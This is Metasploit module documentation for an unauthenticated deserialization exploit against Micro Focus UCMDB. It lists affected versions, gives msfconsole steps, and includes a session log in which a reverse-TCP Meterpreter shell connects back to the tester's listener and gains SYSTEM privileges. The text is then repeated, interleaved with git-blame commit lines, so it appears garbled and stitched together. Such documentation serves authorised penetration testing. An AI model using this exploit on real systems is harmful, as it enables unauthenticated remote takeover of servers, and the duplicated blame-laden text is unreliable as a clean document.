documentation/modules/exploit/multi/http/microfocus_ucmdb_unauth_deser.md

## Vulnerable Application

UCMDB is the vulnerable component, which is integrated into many Micro Focus products. MF have confirmed that the
following are affected by the hardcoded account vulnerability:

* Operation Bridge Manager versions: 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, versions 10.6x and 10.1x and older
  versions
* Application Performance Management versions: 9.51, 9.50 and 9.40 with uCMDB 10.33 CUP 3
* Operations Bridge (containerized) versions: 2019.11, 2019.08, 2019.05, 2018.11, 2018.08, 2018.05, 2018.02, 2017.11

An additional number of applications are vulnerable to the Java deserialization. Note that this module leverages both
vulnerabilities, so it should only work in the above.

Installation docs are available at:

* https://docs.microfocus.com/itom/Operations_Bridge_Manager:2020.05

Vulnerable versions of the software can be downloaded from Micro Focus website by requesting a demo.

Both Linux and Windows installations are affected.

NOTE: At the time of writing this (24/01/2021), Metasploit ysoserial Linux payloads (except cmd/unix/generic) are
broken! Remove this comment once this all works, and change the default payload from `cmd/unix/generic` to
`cmd/unix/reverse_python` in the module code.

All details about these vulnerabilities can be obtained from the advisory:

* https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md

## Verification Steps

1. Install the application
2. Start msfconsole
3. `use exploit/multi/http/microfocus_ucmdb_unauth_deser`
4. `set rhost TARGET'
5. `set lhost YOUR_IP`
6. `set target 0|1`
7. `run`
8. You should get a shell.

## Scenarios

```
msf6 > use exploit/multi/http/microfocus_ucmdb_unauth_deser
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/microfocus_ucmdb_unauth_deser) > set rhost 10.0.0.100
rhost => 10.0.0.100
msf6 exploit(multi/http/microfocus_ucmdb_unauth_deser) > set lhost 10.0.0.1
lhost => 10.0.0.1
msf6 exploit(multi/http/microfocus_ucmdb_unauth_deser) > check
[+] 10.0.0.100:8443 - The target is vulnerable.
msf6 exploit(multi/http/microfocus_ucmdb_unauth_deser) > run

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.100:8443 - Attacking Windows target
[+] 10.0.0.100:8443 - Succesfully authenticated and obtained our cookie!
[*] 10.0.0.100:8443 - Sending payload to /services/DataAcquisitionService
[+] 10.0.0.100:8443 - Success, shell incoming!
[*] Sending stage (175174 bytes) to 10.0.0.100
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.100:50733) at 2021-01-24 22:16:36 +0700

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 15244 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\HPBSM\ucmdb\bin>whoami
whoami
nt authority\system

C:\HPBSM\ucmdb\bin>
```
add UCMDB sploit 2021-01-24 22:25:45 +07:00			`## Vulnerable Application`

Fix a couple of issues in the markdown formatting 2021-01-27 10:00:02 -05:00			`UCMDB is the vulnerable component, which is integrated into many Micro Focus products. MF have confirmed that the`
			`following are affected by the hardcoded account vulnerability:`
add UCMDB sploit 2021-01-24 22:25:45 +07:00
Fix a couple of issues in the markdown formatting 2021-01-27 10:00:02 -05:00			`* Operation Bridge Manager versions: 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, versions 10.6x and 10.1x and older`
			`versions`
add UCMDB sploit 2021-01-24 22:25:45 +07:00			`* Application Performance Management versions: 9.51, 9.50 and 9.40 with uCMDB 10.33 CUP 3`
			`* Operations Bridge (containerized) versions: 2019.11, 2019.08, 2019.05, 2018.11, 2018.08, 2018.05, 2018.02, 2017.11`

Fix a couple of issues in the markdown formatting 2021-01-27 10:00:02 -05:00			`An additional number of applications are vulnerable to the Java deserialization. Note that this module leverages both`
			`vulnerabilities, so it should only work in the above.`
add UCMDB sploit 2021-01-24 22:25:45 +07:00
			`Installation docs are available at:`
Fix a couple of issues in the markdown formatting 2021-01-27 10:00:02 -05:00
add UCMDB sploit 2021-01-24 22:25:45 +07:00			`* https://docs.microfocus.com/itom/Operations_Bridge_Manager:2020.05`

			`Vulnerable versions of the software can be downloaded from Micro Focus website by requesting a demo.`

			`Both Linux and Windows installations are affected.`

Fix a couple of issues in the markdown formatting 2021-01-27 10:00:02 -05:00			`NOTE: At the time of writing this (24/01/2021), Metasploit ysoserial Linux payloads (except cmd/unix/generic) are`
			broken! Remove this comment once this all works, and change the default payload from `cmd/unix/generic` to
			`cmd/unix/reverse_python` in the module code.
add UCMDB sploit 2021-01-24 22:25:45 +07:00
			`All details about these vulnerabilities can be obtained from the advisory:`
Fix a couple of issues in the markdown formatting 2021-01-27 10:00:02 -05:00
add UCMDB sploit 2021-01-24 22:25:45 +07:00			`* https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md`

			`## Verification Steps`

			`1. Install the application`
			`2. Start msfconsole`
			3. `use exploit/multi/http/microfocus_ucmdb_unauth_deser`
			4. `set rhost TARGET'
			5. `set lhost YOUR_IP`
			6. `set target 0\|1`
			7. `run`
			`8. You should get a shell.`

			`## Scenarios`

			```
			`msf6 > use exploit/multi/http/microfocus_ucmdb_unauth_deser`
			`[*] Using configured payload windows/meterpreter/reverse_tcp`
			`msf6 exploit(multi/http/microfocus_ucmdb_unauth_deser) > set rhost 10.0.0.100`
			`rhost => 10.0.0.100`
			`msf6 exploit(multi/http/microfocus_ucmdb_unauth_deser) > set lhost 10.0.0.1`
			`lhost => 10.0.0.1`
			`msf6 exploit(multi/http/microfocus_ucmdb_unauth_deser) > check`
			`[+] 10.0.0.100:8443 - The target is vulnerable.`
			`msf6 exploit(multi/http/microfocus_ucmdb_unauth_deser) > run`

			`[*] Started reverse TCP handler on 10.0.0.1:4444`
			`[*] 10.0.0.100:8443 - Attacking Windows target`
			`[+] 10.0.0.100:8443 - Succesfully authenticated and obtained our cookie!`
			`[*] 10.0.0.100:8443 - Sending payload to /services/DataAcquisitionService`
			`[+] 10.0.0.100:8443 - Success, shell incoming!`
			`[*] Sending stage (175174 bytes) to 10.0.0.100`
			`[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.100:50733) at 2021-01-24 22:16:36 +0700`

			`meterpreter > getuid`
			`Server username: NT AUTHORITY\SYSTEM`
			`meterpreter > shell`
			`Process 15244 created.`
			`Channel 1 created.`
			`Microsoft Windows [Version 6.3.9600]`
			`(c) 2013 Microsoft Corporation. All rights reserved.`

			`C:\HPBSM\ucmdb\bin>whoami`
			`whoami`
			`nt authority\system`

			`C:\HPBSM\ucmdb\bin>`
			```